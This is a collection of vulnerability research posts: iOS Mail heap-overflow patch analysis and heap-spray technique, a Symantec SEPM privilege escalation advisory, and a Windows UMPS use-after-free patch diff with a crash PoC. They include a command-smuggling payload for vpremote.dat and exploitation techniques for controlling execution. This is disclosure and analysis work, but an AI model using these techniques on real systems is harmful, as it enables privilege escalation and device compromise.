In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails it returns False, but still allocates a 8-bytes chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.

 -[MFMutableData appendData:]
 |
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    |
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes which will be an 8-bytes chunk if mmap fails, these functions do not check if mmap fails or not since the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136
-[MFMutableData mutableBytes]
|
+--  -[MFMutableData bytes]
   |
   +--  -[MFMutableData _mapMutableData:]

Since the bytes returned by mutableBytes is usually considered to be modifiable given following from Apple’s documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use The bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] returns self->bytes points to the 8-bytes chunk if mmap fails, which might lead to heap overflow under some circumstances.

The following is an example of how things could go wrong, the heap overflow still would happen even if it checks length before memcpy:

size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];    
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes];//mbytes could be a 8-bytes chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len);//heap overflow if mmap fails
}

iOS 13.5 Patch

Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData] ”, right after mmap fails and it doesn’t return the 8-bytes chunk anymore. This approach fixes the issue completely.

Summary

iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete. 

At ZecOps we help developers to find security weaknesses, and validate if the issue was correctly solved automatically. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program
If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.

Symantec Endpoint Protection Manager (SEPM) 14.2 RU2 MP1 Elevation of Privileges (CVE-2020-5835)

By: admin
19 May 2020 at 06:43

Summary

Assigned CVE: CVE-2020-5835 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 16/03/2020

Vendor’s Advisory: https://support.broadcom.com/security-advisory/security-advisory-detail.html?notificationId=SYMSA1762

An Elevation of Privilege (EoP) exists in SEPM 14.2 RU2 MP1. The latest version we tested is SEPM Version 14 (14.2 RU2 MP1) build 5569 (14.2.5569.2100). The exploitation of this EoP , gives the ability to a low privileged user to execute any file as SYSTEM . The exploitation can take place the moment where a remote installation of the SEP is happening. The attacker escalates privileges, not in the machine which has the SEPM installed, but in the machine which we are going to remotely push (install) the SEP in. The attacker controls the file vpremote.dat which is used in order to provide the command line for the execution of the setup. By altering the command line, the attacker can execute any chosen file. Moreover, the installation uses the C:\TEMP folder, which the user fully controls and thus further attacks with symlinks seem to be possible.

Description

Whenever Symantec Endpoint Protection Manager (SEPM) performs a client installation with remote push (Symantec Endpoint Protection Manager->Clients->Install a Client->Next->Next->Remote Push), the following actions are happening:

  1. By providing the credentials of a user who has Administrative rights on the remote machine (local Administrator, Domain Admin, etc), the SEPM connects to the remote system in order to install the client.
  2. In the remote system, the folder c:\TEMP\Clt-Inst\ is being created and a variety of actions are being performed as SYSTEM. 

Any user with low privileges has full access in the new folders which are being created under the C:\ drive, by default. Any single user can create any folder under the C:\ drive . The inherited permissions allow him and everyone else, to edit/add/remove any file or sub folders, thus any user has full access on subfolders/files under the c:\TEMP folder.

As long as many file operations are being performed as SYSTEM, it seems possible for a user with low privileges to perform a variety of attacks with symlinks, such as Arbitrary file Creations, Arbitrary Deletes and more. These attacks are well documented, so I am not going to use any of those attacks for this blog post. 

In order to present the issue, I am going to escalate my privileges from a user with low privileges and gain access as NT AUTHORITY/SYSTEM. This will be accomplished by modifying the vpremote.dat which is being created to the victim machine, in which we try to install the SEP with “remote push”. I remind that this machine is not necessarily the one which has the SEPM installed and usually is a new machine in which we try install the SEP client for first time.

During the installation process, the file vpremote.dat contains the command line which is going to be executed, probably by the vpremote.exe. This command line, instructs the execution of the setup.exe .By modifying the vpremote.dat, we can instruct the execution of our executable.
In order for this to succeed, we create a vpremote.dat with the following contents:

1.exe & setup.exe 

and we add our executable 1.exe , in the same folder. The 1.exe is irrelevant to the vulnerability. It’s only the file you want to execute as SYSTEM. 

Exploitation

No special exploit is need.

In the following paragraph a step by step explanation of the Video PoC, is provided.

Video PoC Step By Step


00:00-00:49: The Symantec Endpoint Manager Administrator, wants to install the SEP client on a the machine 192.168.2.9 . In this time frame, we watch the non malicious SEP Manager Administrator, who opts to install the client to the machine 192.168.2.9.

00:50-end: This is the view of the machine 192.168.2.9. The SEPM Administrator, from the previous machine, is trying to install the SEP Client on this machine (192.168.2.9 ).
An attacker with low privilege access, has compromised the machine 192.168.2.9 . The attacker at this point has no access to the SEP Manager, or to the Administrator’s password for this machine (192.168.2.9) . He only has low privilege access as user “attacker” on this machine (192.168.2.9).

01:15-01:19: As we can see, the folder C:\Temp\Clt-Inst\ is created and some files are added to this folder. One of the files is the vpremote.dat .

01:24-01:25: We replace the vpremote.dat with our vpremote.dat, which contains the payload “1.exe & setup.exe” and we add to the folder our malicious binary 1.exe .
The file 1.exe is irrelevant. You can use any binary you like. In case you will opt to use your own binary, you may not see the window because it is being executed from the session of the system user. You can observe the process creation from the procmon or you can validate that your 1.exe has been executed, from the Task Manager.

02:06-end: The 1.exe has been executed and the cmd.exe has opened as SYSTEM. My application 1.exe, opens the cmd.exe in the attacker’s session, and this is why it is visible. If you choose your own binary (e.g the notepad.exe) it might not be visible, but you can see it running in the task manager.

Resources

GitHub

Visit our GitHub at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post Symantec Endpoint Protection Manager (SEPM) 14.2 RU2 MP1 Elevation of Privileges (CVE-2020-5835) appeared first on REDYOPS Labs.

A tale of a kiosk escape: ‘Sricam CMS’ Stack Buffer Overflow

By: voidsec
13 May 2020 at 15:24

TL;DR: Shenzhen Sricctv Technology Sricam CMS (SricamPC.exe) <= v.1.0.0.53(4) and DeviceViewer (DeviceViewer.exe) <= v.3.10.12.0 (CVE-2019-11563) are affected by a local Stack Buffer Overflow. By creating a specially crafted “Username” and copying its value in the “User/mail” login field, an attacker will be able to gain arbitrary code execution in the context of the currently logged-in […]

The post A tale of a kiosk escape: ‘Sricam CMS’ Stack Buffer Overflow appeared first on VoidSec.

CVE-2020-1015 Analysis

12 May 2020 at 14:00

This post is an analysis of the April 2020 security patch for CVE-2020-1015. The bug was reported by Shefang Zhong and Yuki Chen of the Qihoo 360 Vulcan team. The description of the bug from Microsoft:

An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.

Microsoft assigned this bug an exploitability rating of 2. Information pulled from the Microsoft Exploitability Index shows this means an attacker would likely have difficulty creating the code, requiring expertise and/or sophisticated timing, and/or varied results when targeting the affected product.

This bug is likely not the most ideal candidate for a fully functioning and reliable exploit. Especially when taking in consideration other EoPs from the April 2020 security patches with an exploitability rating of 1. In any case, it will be interesting to see why the exploitability rating was assigned, and the root cause of the bug.

The remainder of this post will follow the steps I took to analyze the security patch and put together simple proof of concept code for a working crash.


Patch Diffing Windows 10 1903 umpo.dll

To get started we will first need to grab a patched and non-patched version of the relevant file. While not a foolproof method, search engining “User-Mode Power Service file” points us to umpo.dll. We will focus our efforts on the changes in this dll. A patched version can be grabbed by downloading and extracting the .dll from the relevant KB or from an updated Windows 10 system. The non-patched version can be grabbed from a Windows 10 system prior to updating it with April’s updates.

To perform the patch diff I will use Diaphora. Diaphora shows that two functions have been modified UmpoRpcLegacyEventRegisterNotification and UmpoNotifyRegister:

image 1

A third function, UmpoNotifyUnregister, is unmatched and has been removed from the patched version of umpo.dll.

image 2

Reading these modified function names sounds like the vulnerability could be a use after free.


Modified Functions Analysis

Now that the modified functions are known it is time to start reviewing them to identify the bug. Quickly looking at both modified functions reveals that they are not very long. To get an idea of how the functions are called we will check the cross references to each function. There are no cross references from another function to UmpoRpcLegacyEventRegisterNotification. Based on the name it is likely invoked via an RPC call. UmpoNotifyRegister however has one:

image 3


UmpoRpcLegacyEventRegisterNotification

We will delve deeper into UmpoRpcLegacyEventRegisterNotification. I prefer to do dynamic analysis whenever possible, so we will fire up WinDbg and put a breakpoint on the target function:

image 4

The function declaration:

__int64 UmpoRpcLegacyEventRegisterNotification(__int64 a1, 
                                               __int64 a2, 
                                               const wchar_t *a3, 
                                               int a4)

Since this is likely an RPC call (which we will verify later) we will assume the first argument is the RPC binding handle and ignore it. The arguments appear pretty straightforward:

image 5

a3 is a wchar_t which in this case is a service name. a2 is some value that does not point to valid memory so is likely utilized as some constant or identifier. a4 is 0. We will keep track of a4 and see what other potential values it could be. The first section of interesting code marked up with comments is:

  v14 = 0i64;
  v4 = a4;
  v5 = a3;
  v6 = a2;

  // Return if not local client (local RPC only)
  if ( !(unsigned int)UmpoIsClientLocal() )
    return 5i64;

  // Get some object
  v7 = UmpoGetSettingEntry();
  // If not NULL
  if ( v7 )
  {
    // Get another object at v7+32
    v8 = (__int64 *)(v7 + 32);
    // Walk circular linked list until back at head
    for ( i = *v8; (__int64 *)i != v8; i = *(_QWORD *)i )
    {
      // Breaks if object offset 20 == 1 and
      // if object offset 24 == a2
      if ( *(_DWORD *)(i + 20) == 1 && *(_QWORD *)(i + 24) == v6 )
        goto LABEL_11;
    }
    // If not found set i to 0
    i = 0i64;
LABEL_11:
    // If found within circular linked list set v14 to object pointer
    v14 = i;
  }

A reference to an object is obtained by calling UmpoGetSettingEntry(). This object contains a pointer to another object at offset 32. This object appears to be a circularly linked list that is walked in a loop. If the object member at offset 24 is equal to a3 and the object member at offset 20 is equal to 1 the loop breaks.

The second section of interesting code is:

  // if a4
  if ( v4 )
  {
   // if section 1 code loop does not find anything i is 0
    if ( !i )
      return 0i64;
    // otherwise unregister
    result = UmpoNotifyUnregister(i);
  }
  // if a4 == 0 (our current case)
  else
  {
    if ( i )
      return 0i64;
    // Get sessionID of service
    v10 = WTSGetServiceSessionId();
    // call UmpoNotifyRegister
    result = UmpoNotifyRegister(v12, v11, v10, v6, v5, &v14);
  }

This section reveals the purpose of a4. If a4 is non-zero UmpoNotifyUnregister is called with the address returned from the section one code loop. If a4 is 0 UmpoNotifyRegister is called. For documentation purposes we can reduce this function to:

__int64 UmpoRpcLegacyEventRegisterNotification(
   // RPC Binding Handle
   __int64 a1, 
   // Handle
   __int64 a2, 
   // Service Name
   const wchar_t *a3, 
   // 0 to Register 1 to Unregister
   int a4)


UmpoNotifyRegister

This brings us to the second modified function UmpoNotifyRegister. This function is a bit longer than the previous, but still relatively short. Less relevant sections will be omitted. From our work done reversing the last function we already have a good idea of the arguments:

__int64 __fastcall UmpoNotifyRegister(
    // Set to 0 
    STRSAFE_LPCWSTR pszSrc, 
    // Set to 0 
    __int64 a2, 
    // SessionID
    int a3, 
    // Handle
    __int64 a4, 
    // Service Name
    const wchar_t *pszSrca, 
    // Reference to return to calling function? 
    __int64 *a6)

The first interesting section of the second target function:

  v6 = a4;
  v7 = a3;
  v8 = 0;

  EnterCriticalSection(&UmpoNotification);
  if ( service_name )
  {
    v9 = service_name;
    v10 = 256i64;
    // walk through string until null char is encountered
    // or 256 characters are read
    do
    {
      if ( !*v9 )
        break;
      ++v9;
      --v10;
    }
    while ( v10 );
    // v11 set to error code if error if str len > 256
    v11 = v10 == 0 ? 0x80070057 : 0;
    if ( v10 )
      // v12 set to length of string
      v12 = 256 - v10;
    else
      v12 = 0i64;
  }
  else
  {
    v12 = 0i64;
    v11 = -2147024809;
  }

EnterCriticalSection is called to synchronize shared access to an object. Then service_name (which is our service name argument) is walked until a null character is encountered to determine the length of the string.

The second section is the bulk of the function. This function allocates space for a struct that we will call registrant (r for short in the code comments). It turns out that this struct makes up the circular linked list (actually a doubly circular linked list) walked in the for loop in section one of the first function analyzed. The function then populates the new object with the relevant data from our function call arguments, and inserts the object into the front of the list. The struct is defined (rust syntax) as:

struct registrant {
    // pointer to next
    next: usize,
    // pointer to prev
    prev: usize,
    // set to 1 after alloc
    count: u32, 
    // Flags
    flags: u32, 
    // handle we pass
    handle: usize, 
    // heap alloc which is size of service_name + 2 for null char
    service_name: usize,
    // sessionID
    session_id: u32,
    // unknown, might be two u16s
    unknown: u32,
}

With the above struct definition the below code should be relatively straight forward to follow:

 // if no error on service_name length check
 if ( !v11 )
  {
    v13 = (_QWORD *)UmpoGetSettingEntry();
    v11 = 8;
    ...
    // allocate registrant struct memory 48 bytes
    v14 = RtlAllocateHeap(UmpoHeapHandle, 8i64, 48i64);
    v15 = v14;

    // error case on alloc
    if ( !v14 )
      goto LABEL_20;

    v16 = UmpoHeapHandle;
    // r->count is set to 1
    *(_DWORD *)(v14 + 16) = 1;
    // r->prev is set to itself
    *(_QWORD *)(v14 + 8) = v14;
    // r->next is set to itself
    *(_QWORD *)v14 = v14;
    // allocate memory for r->service_name
    v17 = (wchar_t *)RtlAllocateHeap(v16, 8i64, (unsigned int)(2 * v12 + 2));
    // set r->service_name pointer to allocated memory
    *(_QWORD *)(v15 + 32) = v17;

    // error case on alloc
    if ( !v17 )
    {
LABEL_18:
      if ( v15 )
        UmpoDereferenceRegistrant((__int64 *)v15);
LABEL_20:
      if ( v13 && v8 )
        RtlFreeHeap(UmpoHeapHandle, 0i64);
      goto LABEL_21;
    }

    // set r->flags set to 1
    *(_DWORD *)(v15 + 20) = 1;
    // set r->handle to a4 (handle)
    *(_QWORD *)(v15 + 24) = v6;
    // copy func arg service_name into r->service_name
    StringCchCopyW(v17, v12 + 1, pszSrca);
    // umpo!UmpoNotifyRegister+0x111: lea rax, [rsi+20h] 
    v18 = v13 + 4;
    // set r->session_id
    *(_DWORD *)(v15 + 40) = v7;
    // v19 = settingEntry head->next
    v19 = v13[4];
    // check if linked list head->next->prev == head  
    if ( *(_QWORD **)(v19 + 8) == v13 + 4 )
    {
      // inserting at head of list  
      // set r->next to head->next
      *(_QWORD *)v15 = v19;
      // set r->prev to head
      *(_QWORD *)(v15 + 8) = v18;
      // set head->next->prev to r
      *(_QWORD *)(v19 + 8) = v15;
      // set head->next to r
      *v18 = v15;
      // set r+44 to 0
      *(_BYTE *)(v15 + 44) = 0;


UmpoNotifyUnregister

The final function change was the removal of UmpoNotifyUnregister. This function calls EnterCriticalSection and then UmpoDereferenceRegistrant. UmpoDereferenceRegistrant performs some error checks, removes the registrant struct from the doubly linked list and frees both heap allocations performed in UmpoNotifyRegister.


Bug Analysis

We now have a good understanding of the modified/removed functions. Let’s look at the April umpo.dll function changes to see if we can spot the security vulnerability. Solely looking at the Diaphora results it appears that there are quite a few modifications. However with our new understanding of the code, the modifications essentially boil down to one glaring change from a security perspective. EnterCriticalSection and LeaveCriticalSection have been moved from UmpoNotifyRegister to UmpoRpcLegacyEventRegisterNotification. Critical sections are used to synchronize simultaneous access to a shared object within a process. Errors in synchronizing access to shared data produces bugs. Conspicousouly, EnterCriticalSection is moved right above the call to UmpoGetSettingEntry (section one of first function analyzed).

At this point the bug is becoming apparent. UmpoGetSettingEntry returns a global variable which contains a pointer to the head of our doubly circular linked list of registrant objects. The non-patched code does not correctly synchronize access to this object. This error results in a race condition.

Race conditions are bugs, but in a sense are not directly exploitable. Rather, they provide a pathway to a security violation. Initially, the race must be won, which allows the security violation. The violation then must be taken advantage of. With this in mind, let’s think of how this race condition can be taken advantage of. As mentioned earlier, the names of the modified functions invokes the use after free vulnerability class. Following this line of thought, it is straightforward to imagine a scenario where the race condition results in a use after free. Take for example the following scenario with two threads:

Thread 1 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 accesses linked list registrant shared object.
Thread 1 obtains pointer to target registrant struct.
Thread 1 enters UmpoNotifyUnregister.
Thread 2 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 enters UmpoDereferenceRegistrant.
Thread 2 accesses linked list registrant shared object.
Thread 2 obtains pointer to target registrant struct.
Thread 1 frees registrant struct memory.

At this point the thread 2 pointer to the target registrant struct is dangling.


Exploitation PoC to Trigger Crash

To verify that the bug analysis is accurate we must write a simple PoC to trigger the race condition and use after free. Based on the name of UmpoRpcLegacyEventRegisterNotication we have previously assumed that this function is invoked via RPC. To verify this we will use the extremely useful tool NtObjectManager written by James Forshaw.

After importing the NtObjectManager module we can run the below command (more information on this tool here and here):

image 6

This provides all RPC functions we can call from umpo.dll. Reviewing the ouput we see our function:

HRESULT UmpoRpcLegacyEventRegisterNotification(
    /* Stack Offset: 0 */ handle_t p0, 
    /* Stack Offset: 8 */ [In] UIntPtr p0, 
    /* Stack Offset: 16 */ [In] /* FC_SUPPLEMENT FC_C_WSTRING Range(0, 256) */ 
    wchar_t* p1, 
    /* Stack Offset: 24 */ [In] int p2);

We will take all the output from the tool and use that to create our .idl file to make the RPC call. The crash PoC is very simple and the code is available here. The necessary RPC binding initialization is set up and two threads are started.

Thread one repeatedly registers a registrant struct. Thread two randomly flips between registering and unregistering. The service_name argument to UmpoRpcLegacyEventRegisterNotication is set up to be the same size heap allocation as the registrant struct itself (48 bytes) to populate the freed memory. After running the crash code for a bit we get a crash!

image 7

The crash occurs in UmpoRpcLegacyEventRegisterNotication referencing the invalid memory 41414141`41414155, which is our data.


Thanks to Shefang Zhong, Yuki Chen, and James Forshaw for providing tools and knowledge that greatly helped:

tiraniddo

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

9 May 2020 at 19:39
Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge by yourself if these bugs worth an out of band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but therein rests a surprise: an infoleak is not mandatory to be in Mail since an infoleak in almost any other process would be sufficient. Since dyld_shared_cache is shared through most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail, for example CVE-2019-8646 of iMessage can do the trick remotely as well – which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious  in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions. 

the mail-demon vulnerability
were you targeted by this vulnerability?

MailDemon Bounty

Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
--->  
      UNUSED SPACE AT END

Thread 18 name:  Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4


Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for heap spray in this case is a memory leak bug that can be triggered from remote, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such primitive could qualify for up to $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.

Trigger

An oversized email is capable of reproducing the vulnerability as a PoC(see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]“

-[MFMutableData appendBytes:length:] 
{
  int old_len = [self length];
  //...
  char* bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  }
  copy_dst = bytes + old_len;
  //...
  memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}

The destination address of memove is ”bytes + old_len” instead of’ ‘bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value so that the destination address will end up in a invalid address which is beyond the edge of this region and crash immediately, given that the size of MALLOC_NANO region is 512MB.


             +----------------+0x280000000
             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             +----------------+
             |                |
             |                |
             |                |
             |                |
             +----------------+0x2a0000000

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Noteworthy, the “padding” doesn’t mean the overflow address is completely random, the “padding” is predictable by hardware models since the RAM size is the same, and mmap is usually failed at the same size during our tests.

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:           com.apple.mobilemail [521]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]


Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c         b.ls 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
...

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
